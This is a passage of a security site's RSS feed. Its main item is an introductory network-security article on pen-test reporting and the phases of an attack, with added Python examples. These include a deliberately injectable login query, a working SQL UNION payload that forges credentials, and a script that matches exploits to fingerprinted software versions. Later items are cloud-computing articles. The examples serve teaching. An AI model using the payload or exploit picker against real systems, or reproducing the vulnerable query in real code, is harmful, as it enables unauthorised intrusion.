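<p style="text-align: justify;">Running demo() gives no alert for the genuine reply, an alert for the frame that claims the gateway's address, and nothing for the frame that claims the victim's address, because the victim was never seeded and the watcher simply learned the attacker's MAC for it. That third result is the point: a detector that trusts first sightings only catches poisoning of the hosts it already knows, so seed it with the bindings that matter.</p>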
<h2>Bunch of Common Exploits Efficiently Sorted</h2>
<p style="text-align: justify;">This is my collection of exploits in source and binary form. I sort them in subdirectories by operating system, then by how they attack (remote / local), and then by what they attack (BIND / SMTP / HTTP / FTP / SSH etc.). The binary filenames are arbitrary, but the source filenames instantly tell me the name of the exploit and the version of the software that is vulnerable.</p>
<p style="text-align: justify;">This is essential when you're short on time and you need to 'pick one'. I don't include DoS or DDoS exploits; nobody I know would authorise you to take down a production system. Don't do it, tell them up front that you aren't doing it, and only run one if they explicitly insist on it (in writing, like the rest of the rules of engagement).</p>
<h2>Presenting Reports</h2>
<p style="text-align: justify;">This is the critical part -- presenting what you found to people who probably don't understand a word of what your job is about, other than that you're costing them money. You have to show them that there are security problems in their network, and how serious they might be.</p>
<p style="text-align: justify;">A lot of people end the pen-test after the scanning stage. Unless someone specifically tells me to stop there, I believe it is important you exploit the system to at least level 1. There is a very big difference between saying something is vulnerable and actually showing that the vulnerability is exploitable; a scanner's finding may be a false positive, a demonstrated shell is not. Not to mention that, when dealing with a corporate type, 'I gained access to the server' usually gets more attention than 'the server is vulnerable to blah blah'.</p>
<p style="text-align: justify;">After you're done, make a VERY detailed chronological report of everything you did, including which tools you used, what version they are, and anything else you did without using tools (e.g. manual SQL injection). Give the gory technical details in annexes -- make sure the main document has an executive summary and lots of pie charts that they can understand. Try to include figures and statistics for whatever you can.</p>
<p style="text-align: justify;">To cater to the admins, provide a report for each host you tested, and make sure that for every security hole you point out you provide a link to a site with a patch or fix. Try to provide a link to a site with detailed information about the hole, preferably Bugtraq or some other well-known source -- many admins are very interested in these things and appreciate it.</p>
<hr class="system-pagebreak" title="3. A Brief Walk-through of an Attack" />
<h2>A Brief Walk-through of an Attack</h2>
<p style="text-align: justify;">This is an account of how an attacker in the real world might go about trying to exploit your system. There is no fixed way to attack a system, but a large number of attackers will follow a similar methodology, or at least the same chain of events.</p>
<p style="text-align: justify;">This section assumes that the attacker is moderately skilled and moderately motivated to break into your network. He/She has targeted you due to a specific motive -- perhaps you sacked them, or didn't provide adequate customer support (D-link India, are you listening? ;)). Hopefully this will help you figure out where your network might be attacked, and what an attacker might do once they are on the inside.</p>
<p style="text-align: justify;">Remember that attackers will usually choose the simplest way to get into the network. The path of least resistance principle always applies.</p>
<h2>Reconnaissance &amp; Footprinting</h2>
<p style="text-align: justify;">Here the attacker will try to gather as much information about your company and network as they can without making a noise. They will first use legitimate channels, such as Google and your company webpage, to find out as much about you as they can. They will look for the following information:</p>
<p style="text-align: justify;">• <strong>Technical information</strong> is a goldmine: things like a webpage to help your employees log in from home will be priceless to them. So will newsgroup postings by your IT department asking how to set up particular software, as they now know that you use this software and perhaps they know of a vulnerability in it.</p>
<p style="text-align: justify;">• <strong>Personal information</strong> about the company and its corporate structure. They will want information on the heads of IT departments, the CEO and other people who have a lot of power. They can use this information to forge email, or social engineer information out of subordinates.</p>
<p style="text-align: justify;">• <strong>Information about your partners</strong>. This might be useful information for them if they know you have some sort of network connection to a supplier or partner. They can then include the supplier's systems in their attack, and find a way in to your network from there.</p>
<p style="text-align: justify;">• <strong>General news</strong>. This can be useful information to an attacker as well. If your website says that it is going down for maintenance for some days because you are changing your web server, it might be a clue that the new setup will be in its teething stages and the admins may not have secured it fully yet.</p>
<p style="text-align: justify;">They will also query the whois databases to find out what block of IP addresses you own. This will give them a general idea of where to start their network-level scans.</p>
<p style="text-align: justify;">After this they will start a series of network probes. The most basic of these will be to determine whether you have a firewall, and what it protects. They will try to identify any systems you have that are accessible from the Internet.</p>
<p style="text-align: justify;">The most important targets will be the ones that provide public services. These will be :</p>
<p style="text-align: justify;">• <strong>Webservers</strong> - usually the front door into the network. All web server software has some bugs in it, and if you're running home-made CGI scripts such as login pages they might be vulnerable to techniques such as SQL injection.</p>
<p style="text-align: justify;">• <strong>Mail servers</strong> - Sendmail is very popular, and most older versions have had at least one serious vulnerability. Many IT heads don't like to take down the mail server for maintenance, as doing without it is very frustrating for the rest of the company (especially when the CEO doesn't get his mail) -- so it stays unpatched.</p>
<p style="text-align: justify;">• <strong>DNS servers</strong> - Many versions of BIND have been vulnerable to serious attacks. A compromised DNS server can be used as a base for other attacks, such as redirecting users to other websites.</p>
<p style="text-align: justify;">• <strong>Network infrastructure</strong> - Routers and switches may not have been properly secured and may have default passwords or a web administration interface running. Once controlled they can be used for anything from a simple Denial of Service attack by messing up their configurations, to channelling all your data through the attacker's machine to a sniffer.</p>
<p style="text-align: justify;">• <strong>Database servers</strong> - Many database servers still have the default sa account with a blank password, and other common misconfigurations. These are very high-profile targets, as the criminal might be looking to steal anything from your customer list to credit card numbers. As a rule, a database server should never be Internet facing.</p>
<p style="text-align: justify;">The more naive of the lot (or the ones who know that security logs are never looked at) may run an automated vulnerability scanner such as Nessus or Retina over the network. This will ease their work, at the cost of being very noisy.</p>
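<p style="text-align: justify;">The home-made login page from the webserver item above, as an added example that is not from the article: a CGI-era check that pastes the username into its SQL, beside the same check with a bound parameter. It uses an in-memory SQLite table with constructed accounts, and deliberately stores passwords as salted PBKDF2 hashes rather than plaintext, because that is the interesting case: the classic <code>' OR '1'='1</code> payload no longer helps when the password is verified outside the query, but the attacker can still rewrite the query with a UNION to supply the salt and hash the check compares against.</p>

```python
"""String-built login query beside its parameterised form. Added
example, not the article's code; users and passwords are constructed."""
import hashlib
import hmac
import os
import sqlite3

SALT_LEN = 16
ROUNDS = 100_000


def _hash(password, salt_hex):
    return hashlib.pbkdf2_hmac("sha256", password.encode(),
                               bytes.fromhex(salt_hex), ROUNDS).hex()


def make_db():
    """In-memory user table with constructed accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, salt TEXT, pw_hash TEXT)")
    for name, pw in [("alice", "correct horse battery"), ("admin", "Tr0ub4dor&3")]:
        salt = os.urandom(SALT_LEN).hex()
        db.execute("INSERT INTO users VALUES (?, ?, ?)", (name, salt, _hash(pw, salt)))
    return db


def login_vulnerable(db, name, password):
    """The CGI-era pattern: the username is pasted into the SQL text, so
    the attacker decides which row (or which literals) the check sees.
    Returns the user name on success, None otherwise."""
    row = db.execute(
        "SELECT salt, pw_hash FROM users WHERE name = '%s'" % name).fetchone()
    if row is None:
        return None
    salt, pw_hash = row
    return name if hmac.compare_digest(_hash(password, salt), pw_hash) else None


def login_safe(db, name, password):
    """Same logic with a bound parameter: the username is only ever
    compared as data and can never be parsed as SQL."""
    row = db.execute(
        "SELECT salt, pw_hash FROM users WHERE name = ?", (name,)).fetchone()
    if row is None:
        return None
    salt, pw_hash = row
    return name if hmac.compare_digest(_hash(password, salt), pw_hash) else None


def forged_username(password):
    """Username that makes login_vulnerable accept `password`: the UNION
    appends a row whose salt and hash the attacker computed themselves,
    and the trailing comment swallows the query's closing quote."""
    salt = "00" * SALT_LEN
    return "nobody' UNION SELECT '%s', '%s' -- " % (salt, _hash(password, salt))


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin' -- ", "guess"))                # None
    print(login_vulnerable(db, forged_username("guess"), "guess"))   # accepted
    print(login_safe(db, forged_username("guess"), "guess"))         # None
```

<p style="text-align: justify;">Note what the two versions share: the hashing, the constant-time comparison and the lookup by name are identical. The only difference is whether the username reaches the database as a parameter or as part of the statement, and that alone decides whether the attacker can choose the credentials the server checks.</p>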
<h2>Exploitation Phase</h2>
<p style="text-align: justify;">After determining which are valid targets and figuring out what OS and version of software they are using (for example, which version of Apache or IIS the web server is running), the attacker can look for an exploit targeting that particular version. For example, if they find you are running an out-of-date version of Sendmail, they will look for an exploit whose vulnerable range covers that version.</p>
<p style="text-align: justify;">They will first look in their own collection of exploits, because they have tested these. If they cannot find one, they will look to public repositories such as https://www.packetstormsecurity.nl. They will probably try to choose common exploits, as these are more likely to work and they can test them in their own lab first.</p>
<p style="text-align: justify;">Once the exploit succeeds they have already won half the game: they are behind the firewall and can probably see a lot more of the internal network than you ever intended them to. Many networks are very hard to penetrate from the outside but woefully unprotected internally. This hard exterior with a mushy interior is a recipe for trouble -- an attacker who penetrates the first line of defence will have the full run of your network.</p>
<p style="text-align: justify;">After getting in, they will also probably install backdoors on this first compromised system to give them several ways back in, in case their original hole gets shut down. This is why, when you identify a machine that was broken into, it should be rebuilt from scratch (preserving a copy of the compromised disk for analysis if you can): there is no way of knowing what kind of backdoors might be installed. It could be tricky to find a program that runs itself from 2:00AM to 4:00AM every night and tries to connect to the attacker's machine. Once they have successfully guaranteed their access, the harder part of the intrusion is usually over.</p>
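<p style="text-align: justify;">The 'pick one' step, for both the sorted exploit collection described in the pen-testing section and the version matching described here, as an added example that is not the article's own tooling: it indexes a tree laid out as operating system / remote-or-local / service / file and returns the entries whose vulnerable range covers a fingerprinted version. It assumes a file-name convention of <code>&lt;service&gt;-&lt;highest vulnerable version&gt;-&lt;remote|local&gt;.&lt;ext&gt;</code>; binaries keep arbitrary names and are skipped. The listing in <code>SAMPLE_COLLECTION</code> is constructed for the demonstration and makes no claim about any real software version.</p>

```python
"""Index a sorted exploit collection and pick candidates by version.
Added example, not the article's code; the listing is constructed and
the file-name convention is an assumption."""
import os
import re
from collections import namedtuple

Exploit = namedtuple("Exploit", "os vector service max_version path")

_NAME = re.compile(
    r"^(?P<service>[a-z0-9_]+)-(?P<ver>\d+(?:\.\d+)*)-(?P<vector>remote|local)\.[a-z]+$")


def parse_version(text):
    """'8.12.8' -> (8, 12, 8); comparisons are done on these tuples."""
    return tuple(int(part) for part in text.split("."))


def _padded(a, b):
    """Equalise tuple length so that 8.12 compares as 8.12.0."""
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)), b + (0,) * (n - len(b))


def index_paths(paths):
    """Build Exploit records from 'os/vector/service/filename' paths."""
    records = []
    for path in paths:
        parts = path.split("/")
        if len(parts) != 4:
            continue
        os_name, vector, service, fname = parts
        m = _NAME.match(fname)
        if m is None or m["vector"] != vector or m["service"] != service:
            continue            # binary with an arbitrary name, or misfiled
        records.append(Exploit(os_name, vector, service,
                               parse_version(m["ver"]), path))
    return records


def index_tree(root):
    """Walk a real collection on disk (relative paths, '/' separated)."""
    paths = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            rel = os.path.relpath(os.path.join(dirpath, f), root)
            paths.append(rel.replace(os.sep, "/"))
    return index_paths(paths)


def candidates(index, os_name, service, version, vector="remote"):
    """Exploits whose vulnerable range covers the target's version, the
    closest ceiling first (most likely to have been tested on it)."""
    target = parse_version(version)
    hits = []
    for e in index:
        if (e.os, e.vector, e.service) != (os_name, vector, service):
            continue
        t, ceiling = _padded(target, e.max_version)
        if t <= ceiling:
            hits.append(e)
    return sorted(hits, key=lambda e: e.max_version)


SAMPLE_COLLECTION = [                     # constructed directory listing
    "linux/remote/sendmail/sendmail-8.12.8-remote.c",
    "linux/remote/sendmail/sendmail-8.11.6-remote.c",
    "linux/remote/sendmail/smx",          # compiled copy, arbitrary name
    "linux/remote/bind/bind-8.2.2-remote.c",
    "linux/local/kernel/kernel-2.4.20-local.c",
    "windows/remote/iis/iis-5.0-remote.c",
]

if __name__ == "__main__":
    idx = index_paths(SAMPLE_COLLECTION)
    for e in candidates(idx, "linux", "sendmail", "8.11.2"):
        print(e.path)
```

<p style="text-align: justify;">Use <code>index_tree()</code> on the real directory and keep the filenames honest: the version in the name is the highest release the exploit is known to hit, and anything the scanner fingerprints above that ceiling is correctly left out rather than tried at random on a production host.</p>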
<h2>Privilege Escalation Phase</h2>
<p style="text-align: justify;">Now the attacker will attempt to escalate their privileges on the network. They will usually target the administrator accounts, or perhaps a CEO's account. If they are focused on a specific target (say your database server), they will look for the credentials of anyone with access to that resource. They will most likely set up a network sniffer to capture packets as they go through the network, using ARP poisoning if the network is switched.</p>
<p style="text-align: justify;">They will also start manually hunting around for documents that will give them some interesting information or leverage, so any sensitive documents should be encrypted or stored on systems with no connection to the network. This is the time they use to explore your internal network.</p>
<p style="text-align: justify;">They will look for Windows machines with file sharing enabled and see what they can get out of these. Chances are that if they didn't come in with a particular objective in mind (for example stealing a database), they will take whatever information they deem to be useful in some way.</p>
<h2>Clean Up Phase</h2>
<p style="text-align: justify;">Now the attacker has either found what they were looking for, or is satisfied with the level of access they have. They have made sure that they have multiple paths into the network in case you close the first hole. They will now try to cover up any trace of the intrusion. They will manually edit log files to remove entries about themselves, and will make sure they hide any programs they have installed in hard-to-find places.</p>
<p style="text-align: justify;">Remember, we are dealing with an intruder who is moderately skilled and is not just interested in defacing your website. They know that the only way to keep access is if you never know something is amiss. In the event that there is a log they are unable to clean up (one shipped to a separate log host, for instance), they may either take the risk of leaving it there, or flood the log with bogus attacks, making it difficult for you to single out the real one.</p>
<hr class="system-pagebreak" title="4. Where Can I Find More Information?" />
<h2>Where Can I Find More Information?</h2>
<p style="text-align: justify;">Without obviously plugging our site too much, the best place for answers to questions relating to this article is in our forums. The Security/Firewalls Forum is the best place to do this -- you can ask anything from the most basic to the most advanced questions concerning network security there. A lot of common questions have already been answered in the forums, so you will quite likely find answers to questions like 'Which firewall should I use?'.</p>
<p style="text-align: justify;">As far as off-site resources are concerned, network security is a very vast field and there is seemingly limitless information on the subject. You will not learn it from so-called hacker sites full of programs. The best way to learn about network security is to deal with the first word first -- you should be able to talk networking inside out, from packet header to checksum, layer 1 to layer 7.</p>
<p style="text-align: justify;">Once you've got that down, you should start on the security aspect. Start by reading a lot of the papers on the net. Take in the basics first, and make sure you keep reading. Wherever possible, try to experiment with what you have read. If you don't have a home lab, you can build one 'virtually'. See the posts in the Cool Software forum about VMware.</p>
<p style="text-align: justify;">Also, start reading the security mailing lists such as Bugtraq and security-basics. Initially you may find yourself unable to understand a lot of what happens there, but the newest vulnerabilities are always announced on these lists. If you follow a vulnerability from the time it's discovered to when someone posts an exploit for it, you'll get a very good idea of how the security community works, and you'll also learn a hell of a lot in the process.</p>
<p style="text-align: justify;">If you're serious about security, it is imperative that you learn a programming language, or at least are able to understand code if not write your own. The best choices are C and assembly language. However, knowing Perl and Python is also valuable, as you can write programs in these languages very quickly.</p>
<p style="text-align: justify;">For now, here are a few links that you can follow for more information:</p>
<p style="text-align: justify;">www.securityfocus.com - A very good site with all the latest news, a very good library and tools collection as well as sections dedicated to basics, intrusion detection, penetration testing etc. Also home of the Bugtraq mailing list.</p>
<p style="text-align: justify;">www.sans.org - A site with excellent resources in its reading room, people who submit papers there are trying for a certification and as a result its mostly original material and of a very high calibre.</p>
<p style="text-align: justify;">www.security-portal.com - A good general security site.</p>
<p style="text-align: justify;">www.cert.org - The CERT Coordination Center provides updates on the latest threats and how to deal with them. Also has very good best-practice tips for admins.</p>
<p style="text-align: justify;">www.securityfocus.com/archive/1 - This is the link to Bugtraq, the best full disclosure security mailing list on the net. Here all the latest vulnerabilities get discussed way before you see them being exploited or in the press.</p>
<p style="text-align: justify;">www.insecure.org - The mailing lists section has copies of Bugtraq, Full Disclosure, security-basics, security-news etc. Also the home of Nmap, the wonderful port scanner.</p>
<p style="text-align: justify;">seclists.org - This is a direct link to the security lists section of insecure.org.</p>
<p style="text-align: justify;">www.grc.com - For windows home users and newbies just interested in a non technical site. The site is home to Shields Up, which can test your home connection for file sharing vulnerabilities, do a port scan etc, all online. It can be a slightly melodramatic site at times though.</p>
<p style="text-align: justify;">www.eeye.com - Home of the Retina Security Scanner. Considered the industry leader. The eEye team also works on a lot of the latest vulnerabilities for the Windows platform.</p>
<p style="text-align: justify;">www.nessus.org - Open source vulnerability scanner, and IMNSHO the best one going. If you're a tiger team penetration tester and you don't point Nessus at a target, you're either really bad at your job or have a very large ego. If there's a known vulnerability in a system, Nessus will almost certainly find it; what it won't find are flaws in your own home-made applications.</p>
<p style="text-align: justify;">www.zonelabs.com - ZoneAlarm personal firewall for windows, considered the best, and also the market leader.</p>
<p style="text-align: justify;">www.sygate.com - Sygate Personal Firewall, provides more configuration options than ZoneAlarm, but is consequently harder to use.</p>
<p style="text-align: justify;">www.secinf.net - Huge selection of articles that are basically windows security related.</p>
<p style="text-align: justify;">www.searchsecurity.com - A TechTarget site which you should sign up for, with very good information. Chris writes for searchnetworking.com, its sister site -- I don't think the references could be much better.</p>
<p style="text-align: justify;">www.antioffline.com - A very good library section on buffer overflows etc.</p>
<p style="text-align: justify;">www.packetstormsecurity.nl - The largest selection of tools and exploits possible.</p>
<hr class="system-pagebreak" title="5. Conclusion" />
<h2>Conclusion</h2>
<p style="text-align: justify;">This 5-page article should serve as a simple introduction to network security. The field itself is too massive to cover in any sort of article, and the amount of cutting edge research that goes on really defies comprehension. <br /> <br /> Some of the most intelligent minds work in the security field because it can be a very challenging and stimulating environment. If you like to think out-of-the-box and are the sort of person willing to devote large amounts of your time to reading and questioning why things happen in a particular way, security might be a decent career option for you. <br /> <br /> Even if you're not interested in it as a career option, every admin should be aware of the threats and the solutions. Remember, you have to think like them to stop them!<br /> <br /> If you're interested in network security, we highly recommend you read through the networking and firewall sections of this website. Going through the whole site will be some of the most enlightening time you'll ever spend online. 
<br /> <br /> If you're looking for a quick fix, here are a few of the more important areas that you might want to cover:<br /> <br /> <a href="https://www.firewall.cx/networking.html" target="_blank" title="Introduction to Networking">Introduction to Networking</a><br /> <br /> <a href="https://www.firewall.cx/networking/network-fundamentals/firewall-topologies-dmz-zone.html" target="_blank" title="Introduction to Firewalls">Introduction to Firewalls</a><br /> <br /> <a href="https://www.firewall.cx/networking/network-address-translation.html" target="_blank" title="Introduction to Network Address Translation (NAT)">Introduction to Network Address Translation (NAT)</a><br /> <br /> <a href="https://www.firewall.cx/networking/network-fundamentals/dos-attacks.html" target="_blank" title="Denial Of Service&nbsp;(DoS) Attacks">Denial Of Service&nbsp;(DoS) Attacks</a><br /> <br /> <a href="https://www.firewall.cx/networking/network-fundamentals/secure-home-network.html" target="_blank" title="Locking down Windows networks">Locking down Windows networks</a><br /> <br /> <a href="https://www.firewall.cx/networking/network-protocols.html" target="_blank" title="Introduction to Network Protocols">Introduction to Network Protocols</a><br /> <br /> Also check out our <a href="https://www.firewall.cx/downloads.html" target="_blank" title="downloads section">downloads section</a> where you will find lots of very good security and general networking tools.<br /> <br /> We plan on putting up a lot of other security articles in the near future. Some will be basic and introductory like this one, while some may deal with very technical research or techniques. <br /> <br /> As always feel free to give us feedback and constructive criticism. All flames however will be directed to <span style="color: #ff0000;">/dev/null</span> ;)</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Tue, 06 Mar 2012 08:00:00 +1100</pubDate>
		</item>
		<item>
			<title>Are Cloud-Based Services Overhyped?</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/cloud-based-overhype.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/cloud-based-overhype.html</guid>
			<description><![CDATA[<p>In these hard economic times, cloud computing is becoming a more attractive option for many organizations. Industry analyst firm The 451 Group predicts that the marketplace for cloud computing will grow from $8.7bn in revenue in 2010 to $16.7bn by 2013. Accompanying this is an increasing amount of hype about cloud computing.</p>
<p style="text-align: justify;" align="left">Cloud computing has gone through different stages, yet because the Internet only began to offer significant bandwidth in the 1990s, it became something for the masses over the last decade. Initial applications were known as Hosted Services. Then the term Application Service Provider emerged, with some hosted offerings known as Managed Services. More recently, in addition to these terms, Software as a Service (SaaS) became a catchphrase.&nbsp; And as momentum for hosted offerings grew, SaaS is now complemented by Infrastructure as a Service, Platform as a Service, and even Hardware as a Service.</p>
<p align="left"><strong>Is this a sign of some radical technology shift, or simply a bit more of what we have seen in the past?&nbsp;</strong></p>
<p style="text-align: justify;" align="left">The answer is both. We are witnessing a great increase in global investment towards hosted offerings. These providers are expected to enjoy accelerated growth as Internet bandwidth becomes ubiquitous, faster, and less expensive; as network devices grow smaller; and as critical mass builds. Also, organizations are moving towards cloud services of all kinds through the use of different types of network devices – take, for example, the rise of smart phones, the iPad tablet, and the coming convergence of television and the Internet.</p>
<p style="text-align: justify;" align="left">Yet, although cloud solutions may emerge as dominant winners in some emerging economies, on-premise solutions will remain in use. While start-ups and small businesses might find the cloud the cheaper and safer option for their business (enjoying the latest technology without needing to spend money on an IT infrastructure, staff and the other expenses that come with on-premise solutions), larger businesses usually stick to on-premise solutions for both philosophical and practical reasons, such as wishing to retain control and the ability to configure products for their own specific needs.</p>
<p style="text-align: justify;" align="left">Gartner's chief security analyst, John Pescatore, for example, believes that cloud security is not enough when it comes to the upper end of the enterprise, financial institutions, and the government. On the other hand, he states that smaller businesses may actually get better security from the cloud. The reason behind this is that while the former has to protect confidential data and cannot pass it on to third parties, the latter is given better security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more).</p>
<p style="text-align: justify;" align="left">Although the cloud might appear to be finding its fertile ground only now, especially in these times of belt-tightening, hosted services have been around for a while. For this reason, when choosing a cloud provider, always make sure you choose a company that has proven itself in the marketplace.</p>
<p style="text-align: justify;" align="left">&nbsp;</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Fri, 22 Jul 2011 07:33:52 +1000</pubDate>
		</item>
		<item>
			<title>What if it Rains in the Cloud?</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/cloud-based-rain.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/cloud-based-rain.html</guid>
			<description><![CDATA[<p style="text-align: justify;" align="left">Cloud computing has become a cost-effective model for small and medium-sized enterprises, SMEs, that wish to use the latest technology on-demand and with no commitments or need to purchase and manage software products. These features have made hosted services an attractive choice, such that industry analyst firm, The 451 Group, has predicted the marketplace for cloud computing will grow from $8.7billion in revenue in 2010 to $16.7billion by 2013.</p>
<p style="text-align: justify;" align="left">Yet many organizations think twice when it comes to entrusting their data to third parties. Let's face it, almost every web user has an account on sites such as Gmail or Facebook, where personal information is stored on the provider's servers; but when it comes to businesses allowing corporate data to go through third parties, the danger and implications are greater, as an error affects a whole system, not just a single individual.</p>
<h2 align="left">So The Question Arises: What If It Rains In The Cloud?</h2>
<p style="text-align: justify;" align="left">Some SMEs are apprehensive about using hosted services because their confidential data is being handled by third parties and because they believe the solution provider might fail. Funnily enough, it's usually the other way around. Subject to selecting a reputable provider, smaller businesses can attain better security via cloud computing, as the solution provider usually invests more in security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more) than any individual small business could. Also, the second the service provider patches a security vulnerability, all customers are instantly protected, as opposed to downloadable patches that the IT team within a company must apply.</p>
<p style="text-align: justify;" align="left">And, to prevent data leaks, cloud services providers make it their aim to invest in the best technology infrastructures to protect their clients' information, knowing that even the slightest mistake can ruin their reputation – not to mention potential legal claims – and, with that, their business.</p>
<p style="text-align: justify;" align="left">A drawback with some hosted services is that if you decide you want to delete a cloud resource, this might not result in true wiping of the data. In some cases adequate or timely deletion might be impossible, for example because the disk that needs to be destroyed also stores data from other clients. Also, certain organizations find it difficult to entrust their confidential data to third parties.</p>
<h2 align="left">Use Your Umbrella</h2>
<p style="text-align: justify;" align="left">Cloud computing can be the better solution for many SMEs, particularly in the case of start-ups and small businesses which cannot afford to invest in a proper IT infrastructure. The secret is to know what to look for when choosing a provider: Engage the services of a provider that will provide high availability and reliability. It would be wise to avoid cloud service providers that do not have much of a track record, and that perhaps are of limited size and profitability, subject to M&amp;A activity, and changing development priorities.</p>
<p style="text-align: justify;" align="left">To enjoy the full potential promised by the technology, it is important to choose a hosted service provider that has proven itself in the marketplace and that has solid ownership and management, applies stringent security measures, uses multiple data centers so as to avoid a single point of failure, provides aggressive solid service level agreement, and is committed to cloud services for the long term.</p>
<p style="text-align: justify;" align="left">Following these suggestions, you can have peace of mind that your data is unlikely to be subjected to ‘bad weather'!</p>
			<category>Security Articles</category>
			<pubDate>Fri, 22 Jul 2011 07:30:53 +1000</pubDate>
		</item>
		<item>
			<title>Three Reasons Why SMEs Should Also Consider Cloud-Based Solutions </title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/cloud-based-solutions-sme.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/cloud-based-solutions-sme.html</guid>
			<description><![CDATA[<p style="text-align: justify;" align="left"><strong>Small and medium enterprises</strong> (SMEs) are always looking for the optimum way to implement technology within their organizations be it from a technical, financial or personal perspective. Technology solutions can be delivered using one of three common models: as on-premise solutions (i.e. installed on company premises), hosted services (handled by an external third party) or a mix of both. Let's take a look at the cloud-based solutions in this brief post.</p>
<h2 align="left">The Reasons for Cloud-based Backup Solutions</h2>
<p style="text-align: justify;" align="left">When talking about a hosted service, we are referring to a delivery model which enables SMEs to make the most out of the latest technology through a third party. Cloud-based solutions or services are gaining in popularity as an alternative strategy for businesses , especially for startups and small businesses, particularly when considering the three reasons below:</p>
<p style="text-align: justify;" align="left">&nbsp; <strong><em>Financial </em></strong>– Startups and very small SMEs often find it financially difficult to set up the infrastructure and IT system required when they are starting or still building the business. The additional cost to build an IT infrastructure and recruit IT personnel is at times too high and not a priority IT when they just need email and office tools. In such scenario a hosted service makes sense because the company can depend on a third party to provide additional services, such as archiving and email filtering, at a monthly cost. This reduces costs and allows the business to focus on other important areas requiring investment. As the business grows, the IT needs of that company will dictate to what extent a hosted or managed service is necessary and cost-effective.</p>
<p style="text-align: justify;" align="left">&nbsp; <strong><em>Build your business </em></strong> – The cost saving aspect is particularly important for those businesses that require a basic IT infrastructure but it still want to benefit from security and operational efficiency without spending any money. Hosted / managed services give companies the option to test and try technologies before deciding whether they need to move their IT in-house or leave it in the hands of third parties.</p>
<p style="text-align: justify;" align="left">&nbsp; <strong><em>Pay-as-you-go or rental basis </em></strong> – Instead of investing heavily in IT hardware, software and personnel, a pay-per-use or subscription system makes more sense. Companies choosing this delivery model would do well, however, to read contractual agreements carefully. Many vendors/providers tie in customers for two or three years, which may be just right for a startup SME, but companies should look closely at any associated costs if they decide to stop the service and at whether migrating their data will prove a very costly affair. The key to choosing a hosted or managed service is to do one's homework and plan well. Not all companies will find a cloud-based service to be suitable even if the cost structure appears to be attractive.</p>
<h2 align="left">Are There Any Drawbacks To This System?</h2>
<p style="text-align: justify;" align="left">Despite all the advantages mentioned above, some SMEs are still apprehensive when it comes to cloud-based solutions because they are concerned about their data's security. Although an important consideration, a quality cloud-based provider will have invested heavily in security and, more often than not, in systems that are beyond what a small business can afford to implement. A good provider will have invested in multiple backup locations, 24/7 monitoring, physical security to protect sites, and more.</p>
<p style="text-align: justify;" align="left">On the other hand, the fact that the data would be exposed to third parties and not handled internally could be seen as a drawback by some companies, especially those handling sensitive data. As stated earlier, beware of the fine print and medium- to long-term costs before committing.</p>
<h2 align="left">Another Option</h2>
<p style="text-align: justify;" align="left">If you're a server-hugger and need to have that all-important server close to your office, businesses can always combine their on-premise solution with a hosted or managed service – benefiting from the advantages and doing away with the inherent disadvantages.</p>
<p style="text-align: justify;" align="left">Every company is different and whether you decide to go for a cloud-based solution or not, keep in mind that there is no right or wrong – it's all a matter of what your current business's infrastructure is like and your needs at the time. However, if you are a startup or a small business, cloud-based solutions are an attractive option worth taking into consideration.</p>
<p class="arrow" style="text-align: justify;" align="left">&nbsp;</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Fri, 22 Jul 2011 07:26:03 +1000</pubDate>
		</item>
		<item>
			<title>61% of SMEs use Email Archiving in-house – What About the Others ?</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/email-security-archiving.html</link>
			<guid isPermaLink="true">https://www.firewall.cx/tools-tips-reviews/security-articles/email-security-archiving.html</guid>
			<description><![CDATA[<p style="text-align: justify;">A recent survey on email archiving, based on 202 US-based SMEs, found that a growing number of organizations are considering or would consider a third-party hosted email archiving service. A total of 18% of those organizations that already use an email archiving solution, have opted for a hosted service, while 38% said are open to using such a service.</p>
<p style="text-align: justify;">At the same time, 51% of those surveyed said they would still only use an on-premise email archiving solution.</p>
<p style="text-align: justify;">The findings paint an interesting picture of email archiving use among SMEs. Apart from the shocking statistic that more than 63% do not archive their email, those that do, or consider doing so, are interested in the various options available.</p>
<p align="center"><img src="https://www.firewall.cx/images/stories/articles-email-archiving-1.jpg" alt="articles-email-archiving-1" width="447" height="422" /></p>
<h2>On-premise or Hosted?</h2>
<p style="text-align: justify;">An increasing number of IT services are now offered as Software as a Service (SaaS) or hosted by a third party. Many services prove to be very cost effective when implemented at the scale which outsource service providers can manage, but there are still many admins – as the survey shows – who prefer to keep everything in house; security personnel who want to maintain data integrity internally, and business leaders who do not see the value of a cloud solution for their organization because their requirements dictate otherwise.</p>
<h2>What is Email Archiving?</h2>
<p style="text-align: justify;">At its simplest, email archiving technology helps businesses maintain a copy of all emails sent or received by all users. This indispensable solution can be used for searches and to meet eDiscovery, compliance audits and reviews, to increase the overall long term storage capacity of the email system, and as a disaster recovery repository to ensure data availability.</p>
<p style="text-align: justify;">Because email is so heavily tied to the internet, email archiving can readily be outsourced to service providers and can often be combined with other outsourced services like spam and malware filtering. Hosted email archiving eases the load on your IT staff, allowing them to focus on core activities, and can be a more economical solution than paying for additional servers, storage, and tape backups. It does of course require you to entrust your data to a third party, and often this is where companies may opt for an internal solution.</p>
<p style="text-align: justify;">An internal email archiving solution, on the other hand, requires only minimal care and feeding, and offers the advantage of maintaining all data internally.</p>
<p style="text-align: justify;">Email archiving solutions are essential for all businesses of any size, and organizations should consider the pros and cons of both hosted and on-premises email archiving, and deploy the solution which best suits their company's budget and needs.</p>]]></description>
			<category>Security Articles</category>
			<pubDate>Sat, 16 Jul 2011 10:21:49 +1000</pubDate>
		</item>
		<item>
			<title>Email Security - Can't Live Without It!</title>
			<link>https://www.firewall.cx/tools-tips-reviews/security-articles/email-security-threat.html</link>
